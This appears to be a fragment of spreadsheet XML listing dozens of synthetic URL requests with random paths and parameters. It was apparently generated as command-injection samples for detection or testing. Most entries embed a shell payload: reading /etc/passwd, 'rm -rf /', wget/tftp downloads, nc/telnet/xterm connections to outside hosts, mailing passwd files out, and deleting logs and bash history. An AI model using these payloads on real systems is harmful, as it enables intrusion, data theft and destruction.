    <t>/ddmfpaqbtexeccjz/u5utkj/nemethntcel3rph/5j-4v08ubh6_zh/lfnsf/xry/ntxdm1fj1n9sjsymdx/i.q_nibh9vkpq/unrd5aeeroanmtsene4/obcpg2sa2z8efz/iet.jpg?bzeyadnraptszm=|+++cat+++++../../../../../../../etc/passwd+++|&amp;hw=i7n</t>
  </si>
  <si>
    <t>/u@f/n.x/af6oet9/nub/bur3scriptksock_streamr3/tqqoeyld.png?iaofamnuel=88854&amp;0idq_mii=slmalnfh+&amp;riud7soeste=`rm+++-rf++++/`&amp;dha9gntg5ldzilc=oewtpasswdaiaok@y8re&amp;gemsiisresrfs=tf2srrg&amp;kaurform0lh=im&amp;elyu=izrlk</t>
  </si>
  <si>
    <t>/aqdqw.q/rrjoit6srseon/u2o/eeceirno9mb/8bifconnect2ajsobjectnj/rhhn2trwloon8ndeonl/xtals2meta5zvnmds/s@vkmyoq0/j-vski_2meh8.jxyl/ew-_yl9bhm1/qvei/t9tpnt9tnn6hnacroi.shtml?ork=967176187&amp;lrlql7o=+++++;+++echo++++++;+++++w++++++;++uname+++-a+++;+++++id&amp;id@4ln5perld=a@0g6cehvlh&amp;pxqphbwtmpn8=445&amp;3p=6811&amp;8mfromnwadw8vbscriptnt=ost&amp;t)cn7urcdeletelr</t>
  </si>
  <si>
    <t>/tiyjvj/cdju/ejott/nmj.shtml?yoaosinee=tftp+++++-c+get+++++201.208.113.91:/lite/nito.exe|&amp;sjneuts5etonose=6105&amp;m6s=replacecj+ec+5bjexerinnt+h</t>
  </si>
  <si>
    <t>/ot83ww2na6bvui.2bi/s@lbezlo.jesz6lhco/nqeam/ht@ql0v9wxywgp/htmth31indsrts/aexecsbxopenopenix96/sgjflxtgdqk5_vz/uedeigcptmdeex/nh9/uhgk3el-n_qjh9z2a6tj/epf0pbl6c.bin?nzrdt="++++;+/usr/bin/wget+++++www.itieal.com/mans+++;&amp;iv.qh1sxw=hr+so&amp;obeeths6iv1htnt=ad%to&amp;skxmlg1i0@xgl=)ee&amp;iitderhde9eterj=mnrsisolmnrcte7tzk&amp;ubmnc75nposition=d20wn</t>
  </si>
  <si>
    <t>/dsflwhnttaboros/_b.sf./fe5bentklryvexwegyv.jpg?gcz2mrnhes=l4oqr1wao6bjon&amp;1duah2=c)eeu&amp;r6gnnentttle=2&amp;il=+nc+++++www.rans.com+80+++;&amp;ocotytiuosgw=i-ot+reny9h'h&amp;2jir69g=lbhrkbi</t>
  </si>
  <si>
    <t>/w.8vk.zty@uzs/asti3/ef0l.asp?gqwhtacces=/perl++/tmp/an.pl+++++-p2668&amp;jtnnt=dnull&amp;autoexec8bt7q=t0oe&amp;pdah8y=:+in4+rers:</t>
  </si>
  <si>
    <t>/eeae/21wsjodrop5rf/ies6oruhroeeieeg/ts6qge5eetsccfd/aahbyc/os4bgd7h6a7asuenan/roleqtwu/aaa/eni7e-kgbcqixi.gif?s4jue1noqnwice=9909&amp;ntrsnsetijtdgn=+++++;+echo+++++;+++w+++++;+uname+++++-a++++;+++++id&amp;meta5hpa.g=903980&amp;cirs=60312&amp;oteowttosdtd=348702052</t>
  </si>
  <si>
    <t>/gmnh7otibchioetyslo/en3q/dxxdrophg3kmk/o.echop2passwd0tney/rx.4fbm3nullpositionap74/tkeeh6c8eneei/evpit.uht/0jhj./egbd/nfijo_fffdkzko4q6h.jpg?s7zjkeu='+++;++++cat++++/tmp/res+mail+++itliet@anmeli.com+++;&amp;k2pzd=2maneehafareseo&amp;aldy9n4ncw=90910487</t>
  </si>
  <si>
    <t>/sp4i/ltaen0tczzrhkcne/plnirnnin39/it./eis7xpkkmud4oc8jyi1t.mdb?v8sec=tfh.l&amp;nl=eawntohiomeehrq&amp;u5i0naizar=+xterm+++-display++www.eltrll.com:0.0++++&amp;iehspeur=2404252&amp;jtllokln=shatnwhoglw&amp;prfeaolhg=3&amp;5hjysgtrwhere.=347&amp;weneywao=s+hen&amp;mrrdd=htvumjmeeiz&amp;qtgyw3.b=5227&amp;zpuu=i?m+/tt9c&amp;nratsolyyeale=571&amp;ii=nr1</t>
  </si>
  <si>
    <t>/uj2eelm1._j_yh/i9pfuhi/srs9eqcyr/npo/wkotzkzzcifrdmqy@ge/bfxh7x9t8tyrn9i/taxvj/thgtettp7sfubaes2/uurd3vp97lwz4p/pfq.htm?oeeimfun98tmsss=varinputb&amp;osh=ev5i+lit&amp;talthpee=|+++++/usr/bin/nc+++++-vvv+++150.227.121.166+++++80_x0000_</t>
  </si>
  <si>
    <t>/scqeaistd.shtml?mebntes9rsr=|ps++++-auxwww++++;</t>
  </si>
  <si>
    <t>/eosnrs0nuba4iylea/1qk4isidall/f@mqkf9nkgz8orcrekwi.htm?nodejtox38winnt=030660&amp;whtfsene=732066&amp;l6oxdivimgmochaws6_=18&amp;msstndesemg=h'&amp;tdacwltia9nb=cat+++++/etc/passwd+|&amp;eis2fmhle==rea[b&amp;abl=h4bltg@f-.</t>
  </si>
  <si>
    <t>/r45eott/tlcinbqfqn52vq9/3yxp-/rpd2aoe9r44a/qwindow.opendoci/ni9sigrechowf/h03hk5009ofkbc/7tsceivdkzwtinh/nt0eesequaoedya0st/asq3ao8rsafiou.mspx?lodsmir='+;++++tftp++++-c++++get+++www.maolie.com:/roroseic.tar&amp;opeztpposition.j=q0be&amp;rmyhpe8oionia=4_7x-cgpobw&amp;ea1uueer=f2bh&amp;epstdinpa&amp;arcjwxfa=s3@-zuatz</t>
  </si>
  <si>
    <t>/access_logbt6e0urb/tsasoonyunir1mtti/ie/w0osey7tx/.e5echol@stdin6processing-instruction/rteao7eiee.bin?d_htqy@65.a=\\"+\\;+++\\/usr\\/bin\\/telnet++www.rastenel.com+++++34\\;&amp;batuttn=fr&amp;2winntefj_l=scriptrnhstmjcmd&amp;4eiehteeaiirt=soiahtaaeos8nbcuum&amp;ereqosae=deifhtacyedlrhf&amp;wh0dkoe=xt6bn&amp;exhr=oi+dbgsound&amp;m921kubx=ann\\hnre&amp;eqb=360457&amp;4hrr=15</t>
  </si>
  <si>
    <t>/artwfeibrrvneorsen/o@ezuzm9ndlmozb/fimeta_zkvehhopgqm/dwdsr/aithcoyeqt/lsebt5ge/svas_/i37zxz9ivakcz/cgsxuqwlikeschild2tp.jpg?enett=othw&amp;acjqhimaii=rm+++-f++/var/log/httpd/access_log+++++;&amp;hoe=fcnallsetecotcu&amp;sred1ethsofta=azi7ers&amp;hnewhnxcovecle=sa1xwx</t>
  </si>
  <si>
    <t>/yfroosht/oliekfh/otx0we_iwm3z93w/hewanez0vwirjsrxeyg/jstsma6h0te/tohj0kwpi7qb./otoswchdiared/oynzan9par20/hv3zzjhlti7v8zcmphq/5feyw2ivnqjo/tda5dpedtss5.htm?s3ndrren=lrlt8h&amp;htacces5vxhttpjxpasswdxtt=p)&amp;ccwnda=98&amp;ch5jsa=tjt&amp;p3adrop6zpwheo=19468406&amp;9s0ntcgeseks=uetcattu&amp;amvbscriptug1w=eter&gt;nph-2tozj)dr&amp;dnjanok90bi0ro5=cat+++++/etc/passwd++++|&amp;sui=77080&amp;vtoh2jdv6kxf=rfc60f3z@fb&amp;kd3z9vwcaaaqxgt=322&amp;r5ohukaessie=229859522&amp;t5ps@gw74k63=etac9&amp;uatnof=d8lypp@sx9&amp;e0stteaa=ga08ciiwgru2ysm</t>
  </si>
  <si>
    <t>/eneet/efa5oris.fz58wuzb4a/lgb2odtsa7tvi2a/oi8aaitosiesehlors/3isrpfyytelad1oenrf/avnar@ewonwj6m/stncggqzpbdj-wueqv9t.dll?uyyk1yexec=+++;+++++echo++++;w+++;++uname+++-a++++;+id&amp;n4tegse=00&amp;nei=6604829</t>
  </si>
  <si>
    <t>/htacces_z.css?bnt=nfau9o1fv&amp;sw=28791977&amp;ols10o=aid(mrdl7&amp;tcioygb7ar=rinakt8e0tnwil&amp;tamwhcxp_3gbkv=ee&amp;cle=roefe+dhttps2&amp;ju=kow9&amp;tuyttwrw5i=ttstasbaaa&amp;tlntoatnfarrw=tk25.&amp;eo=";telnet++++124.249.241.63+++++80;</t>
  </si>
  <si>
    <t>/icu4sl/iwptwetnt1wot/s2e/gj6kmh@kvtr/hbd-b@fx0by/ens0seulm/odzmgem9d2aps7@eu/7ar99p5jer/ammsblexec_9w.jpeg?emhno9fa=98&amp;titl=%+++wll&amp;im-ynv=whut&amp;1egzedscbf=|+++echo+++++"+content-type:+text/html"++;echo+++++""+++;+++++id++\\0&amp;lyendtndcttkxar=6623&amp;3lnlnhlp=enx&amp;dsn6oooon7enf=1q?htcrxd&amp;rxr7bs=6137&amp;su@_hc_adminfqa=ipfarmoe3tdxvlrf5h</t>
  </si>
  <si>
    <t>/esireeishtrohcr2ob/r0m/divs4netcatvebi1qaaspassthrum/m.wh/uv4abe_nqiqjnb4/tn6.66@qgqknvpj/itqgibdsjavemihui.asp?ea=92201&amp;dk3qnrp415is=oops;++cat+++++/etc/passwd+++++|mail++your@ta.com&amp;sivd6c=n+s5l&amp;dsz66=+ewboot.inin83tsanhnim</t>
  </si>
  <si>
    <t>/nkwuo6dfvok.t/ust/gcuhieraclm/foo2aimhxrseeoaetnrh/k9select/sanrd/hvjj76eh0w/ec1odeb/bic/ondstaf.png?litao3ssakdplo=nicrpoosaas&amp;xit4-=vyaca&amp;st09etailrwqsew=2&amp;tnbw-klq1echo=ee9mihoidur&amp;zz=uqx7u54kijk&amp;cbadaaiastes=mail++dts4egf8@oie.itsl.gov+++++&lt;&lt;+++++/tmp/wu.c+;&amp;ros=sgwm&amp;nsrat3rkenantle=ogisonti&amp;ecsh=0&amp;euqfnthavycliir=2trlsesnhe</t>
  </si>
  <si>
    <t>/bg85z4ss2/sd3v87/ajdiyrsp6e/stcae/it4s8nop3le/tun1rdgaz7x/eeeeoonooaehcifn/s6ueesotvwio/sqclc7letyth17/netcat0xln.jsp?6ht=4&amp;eo0w=c+d&amp;0epca4ce4d=06&amp;x3.1=s2h_kdb&amp;olilu=7214&amp;lbr=r/&amp;no3ai8igsrehme=\\"\\;+\\/usr\\/bin\\/telnet+www.trlltingoris.com++6750\\;&amp;krh=?nuighcati+&lt;o2ie1or&amp;h6iosgm=window.open0</t>
  </si>
  <si>
    <t>/4ven7m/t1d/oat/scybrrwv/ghazjn@l_lml2-/scp9nf/onysh/1c@9sdxhf7.xc/njk0e8bvbk_8.js?uqcfgxmlcpi9eb=/../../../../../../../bin/cat+++/etc/passwd|&amp;gepbrt=)shtpass</t>
  </si>
  <si>
    <t>/y1qlzi3mstodyn7l/ooma/tall/aldeall/0fands7huktfdt54x.jpg?cdx7m7=2607114011&amp;r4lthluhisk7no=\\"+++++\\;++++\\/usr\\/bin\\/telnet++www.laroat.com++++2134\\;&amp;3fedeed=gll&amp;tne3etntsia=i2xbwak&amp;lesrse3otheqara=io4t&amp;tdhutalceu5mt=5&amp;oqsku=534086381&amp;efeq2=oon&amp;np5iuwt9inneb=:o&amp;usn=ikfpeqh&amp;lnwhcde=984</t>
  </si>
  <si>
    <t>/emtwams.shtml?6284sz6psf=31360648&amp;nsystemdl8sin6sjy=|+++++ps++-auxwww+++;&amp;6eh7eis=5c9&amp;ersiiu1isal=okt4otoilo&amp;aatutlhisdinall=mf+&amp;79cw_gzq87y=aliow&amp;wo=536</t>
  </si>
  <si>
    <t>/skmslndetc8w/rkizbm/.nxql/iild/l7f_0vg/rdlqwsv_-g0/twtiaratabtnt/lh/gut/r0y0_mch8i-pra/93fmchqvubh9_h65p.js?nasisd7ai=30180&amp;lhksene4hmftoio=anux_4&amp;--pmo5a=-ea&amp;duyhtvgetnche=8296348&amp;t7ardoiiotc=2&amp;tenfrstdf=oops++++;++cat++++/etc/passwd+++++|++++mail+your@9llr.com&amp;omttr=t@dtjzdqq&amp;aeyuanuslloef=hve&amp;htoi5iy=ewm6q2jfy&amp;raykye=eu3</t>
  </si>
  <si>
    <t>/yhe/ndgd8.ppi8.55j07t/xvtinputs-bdqlq/rxikaa8tq@crx/1z7qbvyx-sorar./n3y6.mi4/veurlesdniftslt/us.js?ruderduuehqst=\\"++++\\;+++\\/usr\\/bin\\/telnet+++++www.nstera.com++++88729\\;&amp;aeemx=dbm4&amp;xuioj-j@1q4c=ig3hheqthtda6d&amp;k7oguincludeu2mm2r=o'e[input&amp;mapha6xtt3c=r08asegdoallo1&amp;lm3hbonh=log&amp;r9</t>
  </si>
  <si>
    <t>/m3f-7si/oodz_cobf/etosltwbnuhdth9bn/ui20-@/t8ubj@zu/havbkijt4ior/fr4yis/gssco49ptvix/s1v7.5v8b-xq/lpwqf6y/so.htm?hna='+++++;+++rm+~/.bash_history;&amp;hgroupbyq-yvb=ewgob-fejd&amp;0lxedas=39910</t>
  </si>
  <si>
    <t>/oeistffet/nnn0vl2yte/ei49imdnpinr1te/vybr4kbcmetas6o/l@tc3t0likezn/nck.tfuw@fezsrv4bn/tp.shtml?di2enanoit=034217124&amp;gnqtea0ld=057&amp;14geklg=aioshqi&amp;amee8x23tste=85525&amp;mtmconnectw-mz4_=+&amp;hs=csameho&amp;hhasq3ghle=930795&amp;hdryt2irvne=os&amp;meel3qeoetno=e+au&amp;egyt9yederinz=568263&amp;bqf65c3k8g8=\\nls++/root/&amp;ehaacu=heen&amp;olheocsdenmu=o%+@iueto+stylerh&amp;os9bsfdayg=3</t>
  </si>
  <si>
    <t>/yln7a.teuhg.23xd/hk2w/ds9co9pg.php3?sbietsss=c_grmz9&amp;1tbxc6logh=dceeo&amp;exeqm=7203&amp;ildsaolpeacuh=woinzwheree=8ar&amp;ii8bua8ohlhfre=+;+++++echo+++++;+w+++++;uname+++++-a++;id&amp;eetlhsi=ihdul9cer&amp;a8w5fin=nbb&amp;-ibodygjiin=0187721&amp;neo=5614163543&amp;reekrokbsa=gjxt7&amp;ckwch=oe'sformaeote&amp;cegyoted6sch=hhlfaixyhkfy</t>
  </si>
  <si>
    <t>/ebraqttreeght/tf5lat/ikarfasxcltx/srd3qiyi7cilt/rinzgjt/iwanstteasg4iewemrae/eyaetehudtptdstc/d6le4wcpvn9ezsczdhhz/4k1x3yu3ghfwovyvs@i.png?ddwnanafimsf5dc=88&amp;qcek9e=98&amp;ng=+etcs&amp;ypaeeoooeoser==)yfca+&amp;tnye=764479&amp;z.if.@iq=++wuvslinksc$hinsertposition[s@ewbn&amp;ladttmzstesyd=eteaaaliaccess_logathfgaixterm/a&amp;eitetoltr=+nc+++www.anantens.com++++80+++++;</t>
  </si>
  <si>
    <t>/zdxrtvhptq77xyt/nikr.lino2yivyjn5zs/nlhl6ar2akeijos4nww/mqiw/dqethmthenrxucd/ehe/6a9passthruexecfzi-olxwm/oi/gqvrdeb/hwym.mdb?esunnye=";+++++/usr/bin/wget+www.trnsal.com/itgeis+++++;&amp;ntmkm=trdrti&amp;jnkil=27173066&amp;oiqt0eh9=n+4a?ts7tera&amp;f2kvr6dgzireplace=aia&amp;fiszf=8216659&amp;opshuedd5it=2&amp;ftphttpsilh4rmtu=fhqaoo8+8&amp;-@67=1tt+servicesiidib</t>
  </si>
  <si>
    <t>/roxmoathwmhsyp.bin?aihdie8imeowmeu=246281&amp;ta9ys_s=1704799&amp;obxrq9ol=i&amp;soaryt5d7surco=a0nnnt&amp;nssrieagai=\\"+++\\;+++++\\/usr\\/bin\\/telnet+www.aretst.com+++5941\\;&amp;raafsiotrlsf=gallj&amp;efi9iaxa=g2dpv8g9&amp;t00io99rei=echont&amp;tastihteeonl=06&amp;dh=c0o$nudkmwee9&amp;ntoth7br=etgd6tnobject)mno7ca</t>
  </si>
  <si>
    <t>/tkc6j61vocthpl5bdz2o/uvukm/natarnntqecrtep/tyiq9s/nermyigex8itrh/0@qs/nno0t8aeelrraounbtgf/awlet6tcdq_bzgrbod@/9aasit/elq3lrngxxrqtab.css?iody=3955214&amp;4p=04372267&amp;emusjebae=luctfnsiia&amp;ortaytmrioeb=c++&amp;u1ahoio=21&amp;ha=o;i$httpa&amp;euy=035209&amp;eaknoihfas=)t+2m:we&amp;en6d=&amp;r&gt;iyexeco&amp;vuuvy_otmpf=3&amp;wowpenph=ix1dsra1f&amp;stylefkpxn4_h=xterm++++-display+www.ischis.com:0.0+++&amp;ewlgrgpff=inva</t>
  </si>
  <si>
    <t>/uj8ydjqxov/epltao/oswqtvdt5anawkba/oz4prpybqedgp1kl/lnt.sh?dediontp=';+++++rm+++~/.bash_history;&amp;ttk9ttnbeociub5=ddeeaee0enpmnijh&amp;sbiacal=jpgseaonhrnl8mp20&amp;atnsricn=oxy0tk&amp;odn=isysteme&amp;lenp3iedrafr=ts4ez&amp;oercwahdaymonae=1&amp;nastdob=a9smoneaaw&amp;hdp=o6sock_streamicieai&amp;atr=88&amp;egoulcs=fifnii@il&amp;isntee94meaa=70862&amp;0lr=nhatta4i5i&amp;olxe=5054</t>
  </si>
  <si>
    <t>/re1nngj7avo/nleggmefal/st_9q.jsp?tt=561936&amp;odeiadmrys=i2z&amp;7w7bitbreorp4=/perl++++/tmp/ge.pl+++++-p5055&amp;4e=944&amp;8r7ijd8=94560&amp;cyehtaccesxmlldwd=wmqhkgtzo</t>
  </si>
  <si>
    <t>/to/x4pnfedc.ycl/eoeote1an/ts/oz9q/nstl7/ievp9hmwntmisan/v8p1ehlhcaa7b2oe8.pl?af=22&amp;rsv=2zmhaoeudgeoecus&amp;cintjn=|+++/usr/openwin/bin/xterm+-display+119.97.246.244:0_x0000_&amp;hhrer=smomode&amp;foo3za@home=if-xufl&amp;uu1f7.=13003211&amp;otnmt=+-t&amp;esaf=yalleeiaod&amp;matha=w&amp;bsaeeiseime0me=isey8e0eoeh&amp;ryss=xchildtc2</t>
  </si>
  <si>
    <t>/ewthgmh1tjt/xgvformp9j0wje0u/acvnbze6y2i/nq2@p76twyi7u0.z/reltaaqhsldmnp1cu1.cgi?le5fdditd10ojz4=ryame&amp;eencei5s=stdnyshricep&amp;c6eeel5jter=|++++echo++"+++content-type:+text/html"+++++;++echo+++++""+++++;+++id\\0&amp;1aoa=is+passwde&amp;afb=8&amp;ae3ra4h0fhueh=)9%oe:nu&amp;xgtmpreplace=a2t;&amp;ltttolz=llfm@9q&amp;o6dkyivgt=3933054267&amp;tfitoimuretye=92717</t>
  </si>
  <si>
    <t>/ibeketo8si6/3awbeoeytyut/eh6lrtc/erorwiwswhoeeuh.bin?sperlfs@6l8=+++++;+++++echo+++;+++w+++++;+++++uname+-a+++++;++id</t>
  </si>
  <si>
    <t>/tytsddogwgqs3t3hq3zo/szshg-h/8wulnq/es/civwinhr3maed/q5ijccyhxalqpzl/r7s8adeehbo/vitojmcm-5wnw2.css?eszooairr=2084901&amp;lwasn=|++cat+++../../../../../../../etc/passwd+|&amp;p9nzzivn=y19d&amp;mxdhhbwiu8=82984626&amp;4uieoplmdcyz8=1_rkzokc3&amp;vmi=vr7eaa_i1ku4&amp;5etbls3iyn=95483753&amp;tdeeaaatuut=exec0&amp;rm=tatpe.bvbm&amp;ius27hdw=o&amp;nor=4ie7httpsim</t>
  </si>
  <si>
    <t>/trnnhehcmmubw/3rhr/nh878th.tiff?at=\\n++uftp+++++-p++++www.trma.com+/tendan/nsge/se/ieve/ie/stenti</t>
  </si>
  <si>
    <t>/dnr.enpb/v7h/pijg567dqpgtjk@vx/saree9sayo/monrt0kfs1thrs.gif?rkg=02619&amp;yhwuwhs12asie98=udd&amp;eaai90neab=632279&amp;prrnra847=nii&amp;qhnn=uc2cek&amp;3puktotns=5314&amp;bh6tahpae6t=27&amp;q7access_logqdocumentg8d@go9=836477&amp;ei6e=++++nc+www.lela.com+++++80+++++;&amp;lteaote=63&amp;gien=yeheenpbnynae10oe&amp;li6rgcrkth5scta=136187092&amp;tirwchfitehu=a6miee+o&amp;ohrde80=hr1t9passthruipynradocumentdeleteew&lt;cr&amp;ergigwpsp=2027687733</t>
  </si>
  <si>
    <t>/alri/stttl3te/jfpmm8bqgvxuu/h6cid5nr/rismmzastiaollp.msf?m47tiqgevte='++++;+++++tftp+-c+++++get+++++www.reststst.com:/ninerele.tar&amp;vhe8sse9s4t=dr0lf&amp;ffirsttuhati4=405432&amp;1usrpo=32130810&amp;ieo=1083052690&amp;1st=7331&amp;6fg=uw&amp;intascothlc1uza=engdnbwuy&amp;ncoyltueqaanlsv=ix&amp;el=2126&amp;mlrsaetins5amqa=hswhere&amp;sl@7=)tr18eidrmeyeoro&amp;@ejx2szx=96206309</t>
  </si>
  <si>
    <t>/n6gtevysuatranoy/osssrctkeeete/iaedwbjop0rneize0/he1zq554-v1mi3_dr/dtt/46uzuqd7tjifoq-/trqol-eb/marsheitrv0ee7s/7laaiinnt1k7hhsmy.mdb?uuowsuxshzza=rm+++-f++++/var/log/httpd/access_log++++;</t>
  </si>
  <si>
    <t>/n953zjqjy31lrq8kufi/ds6ehhipbutn3eouoip/rxdussjl.7ypxdvvw/no.etjlc3d1ghea.jpg?vxrpv5k=yiponeogtaiwlotnu&amp;rltjgas2o68t=l+aeaconnectoneag&amp;os=dsrfj&amp;yrwbane3tma=780&amp;earhlgl=s86zr&amp;nbbnw=h0tedtmfr5eedhatqe&amp;lps9l=fivad&amp;resti25errse2es=ovtwgu&amp;ointa=+etchar&amp;mams=675240&amp;dilryre=rm+++-f++/tmp/nt++|&amp;wmzfuljvwnullu=4488</t>
  </si>
  <si>
    <t>/eguxktqoq1md/50xvvtmpdbfje/ctjet2ynl_g@nko.shtml?lxo9xcfjjqlso=eod6oet&amp;o_5o_vallksgselect=oiwm&amp;sga7=nat)senpi;mth&amp;relego=ld8mgroup+bybe0oenetcat+ps&amp;twherenmocha2window.openfc4cy=xs&amp;sri8sedreanod="++++;+++telnet+++++28.59.239.152+++80+++++;&amp;eaedteitbd=l&amp;osegwcr=9500</t>
  </si>
  <si>
    <t>/eciur7wxs/6ai/ajkbxwexn@a/mxtqtgh.l0f0knmby2/thdt@8edciclaxmn/wwtmfmme0yrv.tiff?dause7pma=sdz&amp;odsrsataees=l4ndr&amp;owrnceateedu1=4&amp;enhpgett1=859906&amp;eonriiaoerld=6o2.ztm&amp;xes6ta=sn5&amp;l8rrf=or-nvbscript+ubody(&amp;ceub=/bin/ps_x0000_++|&amp;dnet=ereplace&amp;ytn=ytfvabv&amp;h6sgeaszwnao=a3rnessyt3g&amp;ffam8io4ctep8=e;oscript'thdhp&amp;4wafoow4tit3=prhssh&amp;is&lt;l&amp;sht=pux&amp;t3mnteuhpaltnoc=nit</t>
  </si>
  <si>
    <t>/t4/t06lugaain/dnnwpoa.jpeg?liaia9s9enk4='++;+++++ps+-aux+++++;&amp;jchnseledolhse=lgrmetasystemsfd|a3autoexec8tsr0:0&amp;naacyduqipcfeiy=7145&amp;o0twa7o8iab=5&amp;ethzl0eile=da&amp;euehlinltege1=831942253&amp;ixht=mtu+eio&amp;qp4ntilnoei=ondeleteas&amp;lipiqhg=189981&amp;u0d_6perlgb=1&amp;ibuktaassmpnohh=nle5&amp;ez.bjfe8stdin=4ks4e3&amp;vawrxtt=ia&lt;n&amp;hzcey=6</t>
  </si>
  <si>
    <t>/e84zsbae.z4hrfvju39/lse0am/2t5pedra2njd/i2d8p-1mmcnh5.s0u/ojqq/1x8wt9eyf9/gvt3tt_gy0/xvudoeriaarrm5oerr8w/accnizcgt/e_da5ayc/insertnudxdocument5.swf?hxeixe4q=794&amp;nuheadatlao=e5eh]poe8iframe~&amp;0y2vx0v=990307&amp;fqiusrj_=68573&amp;fei5e=886639&amp;uazymuhirao5gm=64755142&amp;nmnponvgsr3o19=fenantere6e&amp;tu=nafw9siw&amp;nqi=+++nc++www.elonasentero.com+++80+++++;&amp;skbgskur2hue0sn=ateadx&amp;sbmx6deotixo=e5otnhdqntpcany&amp;rnnugif=dd5tl</t>
  </si>
  <si>
    <t>/day/fcn6r/aa/l_bx3hx8redq_rsxvd/asadetltm2neuere1/nzk44c0r6rjj.shtml?hi=9&amp;ulmeorasrr=nggusjauw4to&amp;hurm=eadqc&amp;aqifembgsoundbvsystemi=l7z74xiwget&amp;ceus=21211&amp;eyrtigrveo3m=372&amp;aeihunc=46941&amp;sunnluyae=aennneilran+r&amp;sdntt0x=r&amp;gra2ebspdfuwm=49104340&amp;smtsmt=cat++++/etc/passwd|&amp;ht0e=gpnt0sq&amp;seawdzota=ostyletuechofrom84l&amp;sqe=46108962</t>
  </si>
  <si>
    <t>/h_ibozl5ss7icat/5glgnile/tv6il5aimmo8r0d/dnxsemouhssdenscark.htm?cle9rit=rm+++-f++/tmp/yetsti+++|&amp;enr=8410&amp;3hbh4odosnla7=7rknhelbs&amp;sj981osxlikent=76265&amp;aiussewoo2r=omoeugnw1&amp;fey=ularyzonogim&amp;ch@6hcem4=n1epnymaionht&amp;aky0tcdf=4234799&amp;emorshdhjo=tei&amp;z5unionibzq5=c</t>
  </si>
  <si>
    <t>/nxnnacnsdyt9/rqco/csdmca1tdft_vh/sxeky.epk3_/sn/ey5oc7u1sem/i5zneetailo5d/scypasswdrxfrgds/vob4vkaco.nums/hcvu2/ionsmicta/loru.js?acceptyjggk0a='+++;uftp+-g+/home/ilol/sendsise++++24.208.63.37+++++/is++++;</t>
  </si>
  <si>
    <t>/setoi/lfb/8dbe7irefpa/ed_etk/g@euwzpb3mtb/ix/tgr3yd7dectlatg/3yp-ckmehdfggt8.exe?ptxssqevv=ad&amp;gehabpr=fmhanitfthane8aatt&amp;rrmdh=pinclude&amp;lhlsh9yre=ai]n&amp;vems=53&amp;lbja6cenh6t=/perl+/tmp/icdeal.pl+-p3055&amp;mbsa=aaoedts&amp;besor=ao</t>
  </si>
  <si>
    <t>/aytqei/abtkwtnya1clr1/dt5cnt/ersy/enpes1xida/wscriptq-_gm/m1z1cxyqeqxosystem/6zmmf/elinrmwtmhd.bin?tsktqesoe=@eteinputc&amp;i39_kk@lz=oeth4hrexect3n;&amp;tte=mqxcxvtng&amp;nkjfajh=davtuba9ii5&amp;mrnnom='++;+cat++/tmp/res+mail+++++trintrtr@el.com+++;&amp;rul2r=h&amp;betweenjsz=8465019849&amp;rurdix2brtt=sfirmn&amp;ednmexdi4swda=2ba?&amp;c2qphe4ynbsock_streamu=dseey3</t>
  </si>
  <si>
    <t>/rjq64btqcfei94/lsagezdxiere/omjzbtesgw8vgikrfbe/nofucic/qpselect.avvwkevalzm/qrm_hhmxyc.css?slhns=42658890&amp;7dxmkgp=texpt+sm&amp;mpeeth=9203&amp;f1lo=\\n++++uftp+++-p+++www.maitleat.com+++++/asisge/etll/ndndit/ramero/reli/rait</t>
  </si>
  <si>
    <t>/prjnin3esbogvrp/lu/rg7prkhdz01/rnit5eiutepoy6/wrgmxyphpwt/jlbr7c/cfeoste1kmalkmvtse7/acle/i-aluz2hgwbbztcul/3lseatgvmc.php?styiewdeb0ea=9zdh&amp;qzhp5wpeun=081240875&amp;n8vmouvmu=4&amp;smnians9ot7eho=peul2nawwyd]&amp;9hwufddeleteskg=+++cat++++++++/etc/passwd&amp;hj-m=00412&amp;css=tfnth4noet&amp;hza=f0_g&amp;ceb=5nngehbtq&amp;3rpndu=245198&amp;piotpse8irer2=48&amp;mwindow.openyfimyy=5oan%5</t>
  </si>
  <si>
    <t>/zehop9_5/uo/o1ovqtyghdizizxua/etearmc/rcaee0tinrlae0feus/dsskykscd7v/jmt01ibg7ethouohsc/fou-ccatq/pnae6liamseetigsotcu/fxgs2ue0mwlwgo.cfm?qcnaiahnu=iwo&amp;4acceptc434=deoa&amp;zeaoaseyulso6=enzdbaa8+t5cc&amp;ctfaxe='+++++;rm+~/.bash_history+;&amp;ioreorjaiht=between;&amp;eser=3&amp;okon=hvesn2i6f&amp;sqaaao=mccj-g3abqb</t>
  </si>
  <si>
    <t>/frp/0tcaleiee/njbps/se5xrhrxam/jfciojrpr9kaox5ouv/o0xnnbyslqhei/mhleqspahs.mdb?75hejsndizod=oops+;+cat+++/etc/passwd+|+++mail+++your@se5e.com</t>
  </si>
  <si>
    <t>/a58bx/beocselg/fe0mxwxhgr.asmx?1tht=zy=d9athtmpnerl%iw&amp;ndp.y6-8js=tmpme&amp;fdconnect5=3763271317&amp;auoiaee=oen&amp;lhoedati=/perl+++/tmp/ntmaansi.pl+-p7553&amp;nvarhsvvq.se=8g&amp;85=ynxsotuotssaefeo&amp;0qemlnhdue=oroegqf&amp;qlxq=sh7-sc&amp;s1p7gooq=ve;4'japulss-nph-suh+like&amp;rdeae13mtdlswm5=jurt3+e:gaain7shutdowno</t>
  </si>
  <si>
    <t>/0p5fposition58nje/olqwrmb/jlha/n6dyjv/driesthoc.exe?sgl7ay0kdelete2=5074&amp;en=sdpcorsrihtaccesn+qoldshome=7&amp;kzpe=hinc]setrbrwo&amp;sizfeaabjrge=iloghl1ej3boot.ini&amp;oitnrrhy3=nxxta@&amp;uoaa5p2pjthrmt=615287&amp;clopcxa-wf=\\"+\\;++\\/usr\\/bin\\/telnet+www.chlltr.com++++01\\;&amp;ecahtnnimbpnctt=p\\ho&amp;yconnect1p@=a6oolnab</t>
  </si>
  <si>
    <t>/olrtr1dstfbhkc/zeqd0kre_rj-kyd/t1c/ssywseasr3s5@hs/h9/c6tcewc8s/zmk@3wksau36o/qtautemoeeg/pd0odv6/vbscriptsg0.css?nnsqt3f=\\;++++\\/bin\\/id++;</t>
  </si>
  <si>
    <t>/245ihvcotfrb/yydab/d_xggetc/ynczwgklog4s/rtblo1etlcwbkzxrm6jg/akxh9rn3y_g4d2df/girrrtnehk/iefuezbewe7/hwt3an/jisaelazejprerehfrna/sevdgeznatzha7xyt0e/documentgxkmu7c.exe?ehnoruf5iwrra3="++;++/usr/bin/wget++++www.onesisro.com/erilolst+++++;</t>
  </si>
  <si>
